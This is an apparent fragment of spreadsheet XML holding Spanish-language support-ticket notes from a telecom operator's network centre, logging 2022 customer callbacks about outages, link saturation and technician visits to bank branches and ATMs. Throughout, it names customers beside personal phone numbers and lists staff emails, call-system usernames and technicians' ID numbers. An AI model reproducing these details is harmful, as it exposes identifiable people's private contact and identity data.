    <t>SE CONTACTA CON CLIENTE JORGE RAMIREZ 50817102
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE CON LA INFORMACION DE LOS TECNICOS PARA TRAMITAR LOS PERMISOS A LA AGENCIA Y CC
F4578169 / SD1129286 / GDN 22160200 / BANCO INDUSTRIAL.- AVENIDA PETAPA 51-57 ZONA 12 BANCO INDUSTRIAL C.C. ATANASIO TZUL, LOCAL 71 /
¿
MICROSOFT OUTLOOK
JUE 26/05/2022 11:18
NO SE PUDO ENTREGAR A ESTOS DESTINATARIOS O GRUPOS: RENE.MONZON@CLARO.COM.GT EL BUZÓN DE CORREO DEL DESTINATARIO ESTÁ LLENO Y NO PUEDE ACEPTAR MENSAJES POR EL MOMENTO. INTENTE REENVIAR EL MENSAJE MÁS TARDE O PÓNGASE EN CONTACTO CON EL DESTINATARIO DIRECTAMENTE.
MONICA YIREH CASTILLO POON
BUENOS DÍAS ESTIMADOS SEÑORES BI,
POR ESTE MEDIO, SOLICITAMOS DE SU APOYO PARA COORDINAR LOS ACCESOS NECESARIOS PARA LA AGENCIA Y EL CENTRO COMERCIAL (AZOTEA, POZOS, DUCTOS) PARA EL PERSONAL TÉCNICO QUE ESTARÁ ATENDIENDO LA FALLA REPORTADA EN BANCO INDUSTRIAL. - AVENIDA PETAPA 51-57 ZONA 12 BANCO INDUSTRIAL C.C. ATANASIO TZUL, LOCAL 71 PARA LA REVISIÓN DEL SERVICIO DE E1 22160200. ADJUNTO ENCONTRARÁ LOS DATOS DEL PERSONAL TÉCNICO.
QUEDAMOS A LA ESPERA DE SUS COMENTARIOS PARA PROCEDER A ENVIAR A LOS TÉCNICOS CUANDO YA ESTÉN LOS PERMISOS GESTIONADOS.
SALUDOS,</t>
  </si>
  <si>
    <t>F4578171</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE LUWIS RUIZ 47119237 MENCIONA QUE PERSISTE EL PROBLEMA EN NO PODER SACAR NI RECIBIR LLAMADAS
-ID 2001356035</t>
  </si>
  <si>
    <t>SE LLAMÓ/HABLÓ CON LEWIS RUÍZ/CLIENTE 47119237 Y SE LE CONSULTA COMPORTAMIENTO DEL SERVICIO, LO VALIDÓ CON SU RECEPCIONISTA; INDICA QUE ENLACE OK, AUTORIZA CIERRE DEL TICKET, SE INFORMA DE LO ANTERIOR A GESTIÓN AE VÍA SKYPE.</t>
  </si>
  <si>
    <t>F4578185</t>
  </si>
  <si>
    <t>**SE LLAMA  A CLIENTE ALVARAO CUMATZ AL 41265941 INDICA QUE AUN SIGUE EL INCONVENIENTE QUE LE APARECE SIN INTERNET || SE NOTIFICA A GESTOR **
ID 2001356435
**</t>
  </si>
  <si>
    <t>F4578188</t>
  </si>
  <si>
    <t>OSCAR TORRES-58656684 VALIDA FUNCIONAMIENTO ##SE PROCEDE AL CIERRE #
2001388079
COLA:
NOMBRE: A: 58656684
NÚMERO: 58656684
DURACIÓN: 0:00:19
ESTADO: CONECTADA
DETALLES: 58656684
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 26/05/2022 13:40:16</t>
  </si>
  <si>
    <t>############# FAVOR TOMAR NOTA- COMENTARIO NO SE GUARDO- ######333 A LAS  11:17 SE HABLO CON CLIENTE Y  QUEDO ENTERADO , HABIA COMENTADO QUE ENVIARIA PERSONAL A PR PARA VERIFICAR ##
ESTE ES EL ID DE LA LLAMDA
RESULTADO: LLAMADA HECHA
NOMBRE: 58656684
NÚMERO: 58656684
INICIO: HOY, 11:17
FIN: HOY, 11:20
DURACIÓN: 3:21
ID DE LLAMADA: 2001340288</t>
  </si>
  <si>
    <t>F4578192</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE EDWIN PAC 42149751 INDICA QUE AUN ESTA MUY INESTABLE EL SERVICIO || SE NOTIFICA A GESTOR **
ID 2001357963
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE BRYAN ALVIZURES 24119191 EXT 10583  NO RESPONDE, SE INTENTARA LUEGO
-ID 2001547619</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE EDWIN PAC 42149751   NO RESPONDE, SE INTENTARA LUEGO
-ID 2001518433 - 2001518683</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE BRYAN ALVIZURES 24119191 EXT 10583 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001534605</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE EDWIN PAC 42149751 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001532398</t>
  </si>
  <si>
    <t>F4578193</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE DANIEL AL 98178117  || SE CONTACTA A CLIENTE Y SE DEJA EN CONFERENCIA CON CLIENTE **
ID 2001359550
**</t>
  </si>
  <si>
    <t>F4578204</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ROBERTO AL 42181770 SOLICITA QUE SE LE LLAME A LA  LIC NANCY DIAZ AL 42183508 **
ID 29001365512
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  LIC NANCY DIAZ AL 42183508 INDICA QUE ESTA DEMASIADO INESTABLE INIDCA QUE TIENE QUE ESTAR REPORTANDO A CADA RATO || SE NOTIFICA A GESTOR PARA EL SEGUIMIENTO **
ID 2001366766
**</t>
  </si>
  <si>
    <t>F4578205</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ESTEFANI AL 37627552 INDICA QUE EL PROBLEMA QUE LE ESTA DANDO ES QUE NO LE DEJA ENVIAR NI RECIBIR CORREOS **
ID 2001369838
**</t>
  </si>
  <si>
    <t>F4578206</t>
  </si>
  <si>
    <t>A NIVEL DE CLARO ENLACE OK, CLIENTE SATURA SERVICIO, POR LO DICHO EN CRONO ANTERIOR SE PIDE A GESTIÓN N1 VÍA SKYPE MOVER TICKET A MONITOREO. SE DEBE VALIDAR SERVICIO MAÑANA A LAS 12:00PM</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JULIO AL 45721739 INDICA QUE SE ENCUENTRA LENTO INDICA QUE TEC NO REALIZO LAS PRUEBAS || SE NOTIFICA A GESTOR PARA EL SEGUIMIENTO **
ID 2001371176
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE SR. JULIO 45721739 SOLICITA QUE SE DEJE EN OBSERVACION PARA MAÑANA A MEDIO DIA YA QUE NO CREE QUE SE ESTE SATURANDO YA QUE DE 10 PC QUE TIENE SOLO ESTA UTILIZANDO 5 PC INDICA QUE ESTARA VERIFICANDO Y QUE SE LE LLAME MAÑANA **
ID 2001399653
**
**</t>
  </si>
  <si>
    <t>F4578210</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ÁNGEL SERRANO 70709738 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001349263 - 2001349578</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ÁNGEL SERRANO AL 70709738 NO RESPONDE, SE INTENTARA LUEGO **
ID 2001391016
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ÁNGEL SERRANO AL 70709738 NO RESPONDE, SE INTENTARA LUEGO **
ID 2001373161
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ÁNGEL SERRANO 70709738 PERO NO RESPONDE, SE INTENTARA LUEGO
-ID 2001375888</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ÁNGEL SERRANO 70709738 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001409060</t>
  </si>
  <si>
    <t>F4578221</t>
  </si>
  <si>
    <t>SE LLAMO A MARIO QUIEN SOLICITA LLAMADA EN 10 MINUTOS VALIDARA SI HAY ALGUN CONTACTO EN SITIO PARA CONTINUAR CON PRUEBAS----</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MARIO HENRIQUEZ AL 70704552 INDICA QUE HUBIERON PROBLEMAS DE ENERGIA PERO QUE YA ESTA RESUELTO Y EL SERVICIO ESTA ESTABLE Y OPERATIVO **
ID 2001391645
**</t>
  </si>
  <si>
    <t>F4578222</t>
  </si>
  <si>
    <t>CLIENTE KEVIN ORELLANA 55112641 UBICA EQUIPO ASMI52 ALARMADO, PROCEDE A REINICIARLO PERO QUEDA EN EL MISMO ESTADO. ID:2001352712 SE ABRIRÁ WO
ASMI52:
PWR     VERDE
SYNC1 ROJO
ALM      ROJO</t>
  </si>
  <si>
    <t>F4578230</t>
  </si>
  <si>
    <t>SSE LLAMA A CLIENTE 25069510 MMENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 2001415061</t>
  </si>
  <si>
    <t>F4578242</t>
  </si>
  <si>
    <t>CLIENTE INDICA QUE NO SE ENCUENTRA EN LAS INSTALACIONES Y NO SABE A QUE HORA REGRESARA, SOLICITA QUE SE LE CONTACTE A  64317354 - EVA HERNANDEZ PARA REALIZAR PRUEBAS EN EL PUNTO
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE EVAGELINA 64317354  PARA VALIDAR EL SERVICIO, CLIENTE REALIZA PRUEBAS Y NOS CONFIRMA SERVICIO OPERATIVO, SE PROCEDE CON EL CIERRE DE CASO
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4578255</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE KEYLI ORTIZ-78098898 VALIDA SERVICIO ## TODO OK ##POSIBLE PROBLEMA A NIVEL INTERNO ## A NIVEL DE CLARO TODO OK ##
2001355970
COLA:
NOMBRE: A: 0050378098898
NÚMERO: 0050378098898
DURACIÓN: 0:00:17
ESTADO: CONECTADA
DETALLES: 0050378098898
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 26/05/2022 12:00:14</t>
  </si>
  <si>
    <t>F4578258</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 59678338 MENCIONA QUE TODO ESTA FUNCIONANDO CORRECTAMENTE, EL PROBLEMA FUE EL DIA DE AYER
-ID 2001372875</t>
  </si>
  <si>
    <t>F4578264</t>
  </si>
  <si>
    <t>SE LLAMÓ A CLIENTE 50082749/59522280 PARA VALIDAR SERVICIO, EN EL SEGUNDO, CONTESTA FERNANDO/SIN APELLIDO INDICA QUE ESTÁ MUY OCUPADO. SE CONSULTA A GESTIÓN N1 VÍA SKYPE CÓMO VEN COMPORTAMIENTO DEL SERVICIO.</t>
  </si>
  <si>
    <t>SE LLAMÓ A CLIENTE 50082749/59522280 PARA VALIDAR SERVICIO, NO CONTESTA. SE CONSULTA A GESTIÓN N1 VÍA SKYPE CÓMO VEN COMPORTAMIENTO DEL SERVICIO.</t>
  </si>
  <si>
    <t>F4578270</t>
  </si>
  <si>
    <t>JAVIER RUANO 55173525 INFORMA QUE LA DIRECCION CORRECTA ES: CB115 - DIAGONAL 6 13-01, ZONA 10, LOCAL 119, CENTRO COMERCIAL OAKLAND MALL, ID: 670700019, SE LLAMA A CC PARA GENERAR NUEVO INCIDENTE....</t>
  </si>
  <si>
    <t>ENLACE CAIDO, SE LLAMA A CLIENTE SR. JAVIER RUANO 55173525 NO CONTESTA IVR ENVIA  BUZON, SE NECESITA VALIDAR EQUIPOS DE UM. DESCARTAR PRUEBAS N1. ID: 2001360580.</t>
  </si>
  <si>
    <t>JAVIER RUANO 55173525  VALIDA QUE EL ROUTER ESTA ENCENDIDO, APLICA REINICIO PERO ENLACE CONTINUA CAIDO....</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JAVIER RUANO 55173525 MENCIONA QUE PERSISTE EL INCONVENIENTE, SE DEJA EN CONFERENCIA CON GESTOR
-ID 2001370281</t>
  </si>
  <si>
    <t>F4578271</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE LIC. ADRIAN PINEDA 24156815 ID 2001407857 PARA EL SEGUIMIENTO DEL TICKET EN EL CUAL SE LE COMENTA Y SE LE INDICA QUE SE CONTACTAR CON EL GESTOR SAMUEL.ESTRADAG AL 8126 ID 2001408293 ATIENE LEONEL RODAS Y COMUNICA AL GESTOR A CARGO SE TIENE EN LINEA A SAMUEL Y SE DEJA CON EL CL EN LINEA.</t>
  </si>
  <si>
    <t>F4578273</t>
  </si>
  <si>
    <t>CLIENTE MARIELA DE MUÑOZ74680992 INDICA QUE TIENE INCONVENIENTE CON UNA DE SUS EXTENSIONES LAS CUALES NO ESTÁ SACANDO LLAMADAS. SE LE COMENTA AL CLIENTE QUE CLARO NO ADMINISTRA LAS EXTENSIONES, ESTE INCONVENIENTE DEBE REPORTARLO CON SU PROVEEDOR DE LA PBX. A NIVEL DE CLARO EL E1 NO PRESENTA PROBLEMAS. CLIENTE ESTA DE ACUERDO, ESCALARÁ CON SU PROVEEDOR. SE PROCEDE AL CIERRE DEL CASO.
2001361901
COLA: CNOC_ACCESO_EMPRESARIAL
NOMBRE: DE: 0050322503355
NÚMERO: 0050322503355
DURACIÓN: 0:04:00
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 0050322503355
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: SAQITZUNUN.COJTI
FECHA Y HORA LOCALES: 26/05/2022 12:22:14 P. M.</t>
  </si>
  <si>
    <t>F4578275</t>
  </si>
  <si>
    <t>DESPUES DEL REINICIO DEL EQUIPO, EQUIPO QUEDA EN EL MISMO ESTADO, SE LE INDICA AL CLIENTE QUE PROBABLEMENTE HAYA ALGUN CORTE O DAÑO EN LA RED Y ES NECESARIO ENVIAR PERSONAL TECNICO, CLIENTE ENTERADO INDICA QUE NO HAY QUE TRAMITAR PERMISOS PERO QUE PUEDEN INGRESAR A LA AGENCIA A PARTIR DE LAS 13:30 HRS POR EL HORARIO DE ALMUERZO
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  ANGEL HENRIQUEZ 79859972 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 2001414287</t>
  </si>
  <si>
    <t>CLIENTE UBICA ASMI 54L EN LAS INSTALACIONES
PWR - VERDE
SYNC A - ROJO
ALM - ROJO
CLIENTE NOS APOYA REINICIANDO EL EQUIPO
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE ANGEL HENRIQUEZ 79859972
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4578279</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 25562920 QUIEN COLOCA EN CONFERENCIA A PERSONAL ENCARGADO DE COORDINAR LAS VISITAS
TECNICAS, CLIENTE SOLICITA VISITA PARA LAS 17:30 HRS
-ID 3001119897
-ID 3001119897</t>
  </si>
  <si>
    <t>SE ENVIA  CORREO A CLIENTE  SOLICITANDO ACCESOS
SOLICITUD CLARO - APERTURA DE CASO ENLACES PRINCIPAL IP2029182 Y BACKUP IP2025150 (R_ATMCLARO (257) MRDONUT ESCALON Y R_ATMCLARO (267) GARAN_CASETA 1)
J
JONATHAN EDUARDO TEZEN MEJIA
PARA:GRUPO N1;ERNESTO RUBIO &lt;ERNESTO.RUBIO@DAVIVIENDA.COM.SV&gt;;HELMAN RIVAS &lt;HELMAN.RIVAS@DAVIVIENDA.COM.SV&gt;
CC:LUIS A FUENTES &lt;LUIS.A.FUENTES@DAVIVIENDA.COM.SV&gt;;MARIO BLANCO &lt;MARIO.BLANCO@DAVIVIENDA.COM.SV&gt;;MELVIN ESTRADA &lt;MELVIN.ESTRADA@DAVIVIENDA.COM.SV&gt;;MOISES MARROQUIN &lt;MOISES.MARROQUIN@DAVIVIENDA.COM.SV&gt;Y 2 MÁS
JUE 26/05/2022 14:00
BUENA TARDE  ESTIMADO CLIENTE
 SOLICITANDO DE SU AMABLE APOYO CON GESTIONAR ACCESOS A NUESTRA ÁREA TÉCNICA PARA VALIDAR SERVICIO, F4578279 | IP2029182SV |BANCO DAVIVIENDA SALVADORENO S.A. | SAN SALVADORCOL. ESCALONPASEO GENERAL ESCALON85 AVE NORTE
TECNICO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2400310-1   3796    EDGAR MAURICIO MONTOYA SANCHEZ
04086816-7   12404  GERARDO ANTONIO MINERO
FAVOR BRINDAR HORA  Y FECHA PARA GESTIONAR VISITA
SALUDOS,</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: LUNES, 30 DE MAYO DE 2022 12:52
PARA: CORPORATIVOS, CLIENTES &lt;CLIENTESCORPORATIVOS@CLARO.COM.SV&gt;; LUIS A FUENTES &lt;LUIS.A.FUENTES@DAVIVIENDA.COM.SV&gt;
CC: SAMUEL ANTONIO ESTRADA GREGORIO &lt;SAMUEL.ESTRADAG@CLARO.COM.GT&gt;; HELMAN RIVAS &lt;HELMAN.RIVAS@DAVIVIENDA.COM.SV&gt;; JONATHAN EDUARDO TEZEN MEJIA &lt;JONATHAN.TEZENM@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; ERNESTO RUBIO &lt;ERNESTO.RUBIO@DAVIVIENDA.COM.SV&gt;; MARIO BLANCO &lt;MARIO.BLANCO@DAVIVIENDA.COM.SV&gt;; MELVIN ESTRADA &lt;MELVIN.ESTRADA@DAVIVIENDA.COM.SV&gt;; MOISES MARROQUIN &lt;MOISES.MARROQUIN@DAVIVIENDA.COM.SV&gt;; DAVID ALVARENGA &lt;DAVID.ALVARENGA@DAVIVIENDA.COM.SV&gt;; MIGUEL TREJO &lt;MIGUEL.TREJO@DAVIVIENDA.COM.SV&gt;; JUAN CARLOS LOPEZ SANCHEZ &lt;JUAN.LOPEZS@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD CLARO - APERTURA DE CASO ENLACES PRINCIPAL IP2029182 Y BACKUP IP2025150 (R_ATMCLARO (257) MRDONUT ESCALON Y R_ATMCLARO (267) GARAN_CASETA 1)
*-*-*-*-*</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A SOLICITUD DE CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: LUNES, 30 DE MAYO DE 2022 15:46
PARA: CORPORATIVOS, CLIENTES &lt;CLIENTESCORPORATIVOS@CLARO.COM.SV&gt;
ASUNTO: RE: SOLICITUD CLARO - APERTURA DE CASO ENLACES PRINCIPAL IP2029182 Y BACKUP IP2025150 (R_ATMCLARO (257) MRDONUT ESCALON Y R_ATMCLARO (267) GARAN_CASETA 1)
BUENA TARDE
    EN SEGUIMIENTO AL CASO IP2029182 SE COORDINA CON MELVIN ESTRADA VISITA PARA HOY LUNES 30/05 A LAS 17:30 HORAS.
CUALQUIER CONSULTA, A LA ORDEN.
*-*-*-*</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MENCIONA QUE YA SE COORDINO LA VISITA PARA LAS 17:30 HORAS
CLIENTE PRESENTA PROBLEMA CON EL CORREO POR LO QUE SOLICITA SE PUEDA ENVIAR UN CORREO CONFIRMANDO LA HORA DE VISITA
-ID 3001119897</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE HELMAN RIVAS 25562880 QUIEN SOLITA SE PUEDA LLAMAR AL NUMERO 25562920
-ID 3001116549</t>
  </si>
  <si>
    <t>F4578281</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. HELMAN  RIVAS 25562880 DESCARTAN PROBLEMAS DE ENERGIA, SOLICITAN REVISAR PRIMERO A NIVEL DE PLANTA EXTERNA, SOLICITAN ENVIAR LOS DATOS DE PERSONAL TECNICO PARA INGRESO AL SITIO DEL ATM SI FUESE NECESARIO.</t>
  </si>
  <si>
    <t>F4578286</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  ALEXANDER ROSALES 48753471 MENCIONA QUE SOLO SE PUEDEN CONECTAR POR MEDIO DE WIFI Y LOS DEMAS VAN CONECTADOS POR MEDIO DE CABLE A UN EQUIPO CISCO
SE LE MENCIONA QUE NUESTROS EQUIPOS UNICAMENTE ES HAST EL FORTINET, CLIENTE INDICA QUE VA ESCALAR EL CASO CON SU IT
-ID 2001364970</t>
  </si>
  <si>
    <t>F4578288</t>
  </si>
  <si>
    <t>NO SE TUVO RESPUESTA POR PARTE DE EL ORGANIZADOR DEL MEET SE DEJO EN PENDIENTE Y SE DIO SEGUIMIENTO LOS SIGUIENTES CASOS SE QUEDA PENDIENTE REPROGRAMAR CON CLIENTE YA QUE NO SE TUVO RESPUESTA DE SU PARTE.</t>
  </si>
  <si>
    <t>F4578291</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  FRANCISCO RUIZ 70035180 MENCIONA QUE EL SERVICIO HA MEJORADO PERO AUN NO HA RECIBIDO EL CORREO POR LO QUE CONFIRMA EL CORREO FRANCISCO.RUIZ@SOPESATOTAL.COM
-ID 2001457636</t>
  </si>
  <si>
    <t>SE ENVIA CORREO CON EVIDENCIA DE LA SATURACION DEL ENLACE, SE LLAMADA DESPUES DE LAS 16 HORAS PARA VALIDAR ENLACE CON CLIENTE.
ASUNTO: EVIDENCIA DE SATURACIÓN DEL ENLACE IP2043012 || CREDI OPCIONES SA DE CV</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE FRANCISCO RUIZ AL 70035180  SOLICITA QUE SE LE LLAME NUEVAMENTE A LAS 16:00 HRS Y QUE SI SE LE PUEDE INDICAR QUE ES LO QUE ESTA PROVOCANDO LA SATURACION SI ES ALGUN EQUIPO || SE NOTIFICA A GESTOR **
ID 2001398175
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE FRANCISCO RUIZ 70035180 QUIEN SOLICITA SE LLAME A LAS 17:15 HRS
-ID 2001441354 - 2001442480</t>
  </si>
  <si>
    <t>CLIENTE MENCIONA QUE ESTARA REALIZANDO PRUEBAS POR LO QUE SOLICITA LLAMADA PARA MAÑANA A LAS 10:00 HRS
-ID 2001457636</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: JUEVES, 26 DE MAYO DE 2022 17:21
PARA: RODRIGUEZ CRISTOBAL, MIGUEL ANGEL &lt;MIGUELAN.RODRIGUEZ@CLARO.COM.GT&gt;; FRANCISCO.RUIZ@SOPESATOTAL.COM &lt;FRANCISCO.RUIZ@SOPESATOTAL.COM&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CORPORATIVOS, CLIENTES &lt;CLIENTESCORPORATIVOS@CLARO.COM.SV&gt;
ASUNTO: RE: EVIDENCIA DE SATURACIÓN DEL ENLACE IP2043012 || CREDI OPCIONES SA DE CV
*-*-*-*-*</t>
  </si>
  <si>
    <t>F4578300</t>
  </si>
  <si>
    <t>SE LLAMÓ A CLIENTE 30916044 PARA SEGUIMIENTO Y/O VALIDAR SERVICIO, NO CONTESTA; SE CONSULTA A GESTIÓN N1 VÍA SKYPE CÓMO VEN COMPORTAMIENTO DEL SERVICIO.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SERGIO RODRIGUEZ 66766451 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001428393</t>
  </si>
  <si>
    <t>F4578302</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SRTA. SANDRA ARGUIJO 87691761 SOLICITA TIEMPO YA QUE SALIO A COMPRAR SU ALMUERZO ...</t>
  </si>
  <si>
    <t>CLIENTE SRTA. SANDRA ARGUIJO 87691761 INFORMA QUE YA ESTA EN SITIO, UBICA LOS EQUIPOS CONFIRMA QUE ETAN ENCENDIDOS, APLICO REINICIO, ENLACE CONTINUA DOWN, SE PROCEDE A SOLICITAR APOYO DE PERSONAL TECNICO.
ETX-1
PWR: ROJO
NET1: APAGADO
USER 3: VERDE</t>
  </si>
  <si>
    <t>F4578304</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ARELY PLEITEZ-70971341 NO CONTESTA-  || SE INTENTARA NUVEMANTE EN BREVE ##ENVIA A BUZON
2001387205
COLA:
NOMBRE: A: 0050370971341
NÚMERO: 0050370971341
DURACIÓN: 0:00:16
ESTADO: MARCANDO
DETALLES: 0050370971341
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 26/05/2022 13:37:06
2001387296
COLA:
NOMBRE: A: 0050370971341
NÚMERO: 0050370971341
DURACIÓN: 0:00:02
ESTADO: MARCANDO
DETALLES: 0050370971341
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 26/05/2022 13:37:18</t>
  </si>
  <si>
    <t>CLIENTE ARELY PLEITEZ-70971341 VALIDA QUE YA TIENE LLAMADAS ENTRANTES Y SALIENTES, AUTORIZA EL CIERRE DEL CASO.
ID: 2001561753</t>
  </si>
  <si>
    <t>SE TIENE EN LINEA AL CLIENTE ARELY PLEITEZ, QUIEN VA A UBICAR LOS EQUIPOS.
2001412713
COLA:
NOMBRE: A: 0050370971341
NÚMERO: 0050370971341
DURACIÓN: 0:00:21
ESTADO: CONECTADA
DETALLES: 0050370971341
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 26/05/2022 14:57:15</t>
  </si>
  <si>
    <t>F4578323</t>
  </si>
  <si>
    <t>CLIENTE ERICK HERNANDEZ 56367091 VALIDA QUE YA ESTÁ OPERATIVO, SOLICITA SE LE LLAME EN 1 HORA PARA VALIDAR. ID: 2001371655</t>
  </si>
  <si>
    <t>CLIENTE ERICK HERNANDEZ 56367091 VALIDA QUE EL E1 CONTINÚA FUNCIONANDO CORRECTAMENTE, CC FAVOR SU APOYO VALIDANDO CON SD A LAS 3 PM A SOLICITUD DEL CLIENTE. ID DE LLAMADA: 2001389428</t>
  </si>
  <si>
    <t>F4578324</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JOHAN YUCUTE 53382931 - 78310049 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 2001429755 - 2001429966</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JOHAN YUCUTE 53382931 MENCIONA QUE SI CUENTAN CON ENERGIA
-ID 2001369092</t>
  </si>
  <si>
    <t>F4578327</t>
  </si>
  <si>
    <t>CLIENTE YA CONFIRMA QUE CUENTA CON SERVICIO DE INTERNET MEDIANTE WIFI PERO LOS POS AUN NO LOS VE FUERA-- CUENTA CON INTERNET PARA UNA PC Y ESTA TAMBIEN SE ENCUENTRA FUERA-- APLICO RIENICIO EN ESPERA -</t>
  </si>
  <si>
    <t>F4578332</t>
  </si>
  <si>
    <t>SE CONTACTA ANGEL RODRIGUEZ DEL 23027110 ID 2001411578 PARA EL SEGUIMIENTO YA QUE REALIZARON PRUEBAS Y SIGUE CON AFECTACION Y ES REINCIDENTE, POR LO QUE SE TRANSFIERE CON EL GESTOR LUIS.IXCOT 8126 ID 2001413457 PARA EL SEGUIMIENTO Y NO RESPONDE, SE LLAMA DIRECTO A SU EXT 7746 ID 2001413748 Y NO ATIENDE SE LLAMA NUEVAMENTE AL 8126 ID 2001413984 ATIENDE MARLON RAMOS SE LE BRINDA LA INFORMACIÓN E INTENTA TRASLADAR LA LLAMADA CON EL GESTOR A CARGO SIN EXITO YA QUE SOLICITA TIEMPO EN ESPERA Y NO RETOMA DESPUES DE LOS 2 MINUTOS
ID 2001413984
NOMBRE: A: MARLON ESTUARDO RAMOS
NÚMERO: 4869
DURACIÓN: 0:05:51
ESTADO: CONECTADA
DETALLES: 4869
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: GUSTAVO.BARAHONA
FECHA Y HORA LOCALES: 26/05/2022 15:05:47
SE LIBERA LA LLAMADA Y EL CLIENTE TAMBIÉN COLGO
ID 2001411578
COLA: CORPORATIVO_ENLACES_NIVEL_2
NOMBRE: DE: 23027110
NÚMERO: 23027110
DURACIÓN: 0:10:19
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 23027110
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: GUSTAVO.BARAHONA
FECHA Y HORA LOCALES: 26/05/2022 15:07:18
SE LE DEVUELVE LA LLAMADA AL CLIENTE Y NO RESPONDE SE DEJA ESCALADO CON JUAN MANUEL CARDONA AL  41287321 ID 2001417456 SE LE BRINDA LA INFORMACIÓN.
POR TAL RAZON POR FALTA DE MOVIMIENTO EN EL TICKET Y CL REPORTA LA AFECTACION SE MUEVE A WIP PARA EL SEGUIMIENTO. SE NOTIFICA AL GESTOR  LUIS.IXCOT VIA SKYPE</t>
  </si>
  <si>
    <t>F4578354</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CLAUDIA  QUIEJ 50751053 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 2001431978</t>
  </si>
  <si>
    <t>F4578355</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SERGIO ZEPEDA 77968281 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 2001432900</t>
  </si>
  <si>
    <t>F4578366</t>
  </si>
  <si>
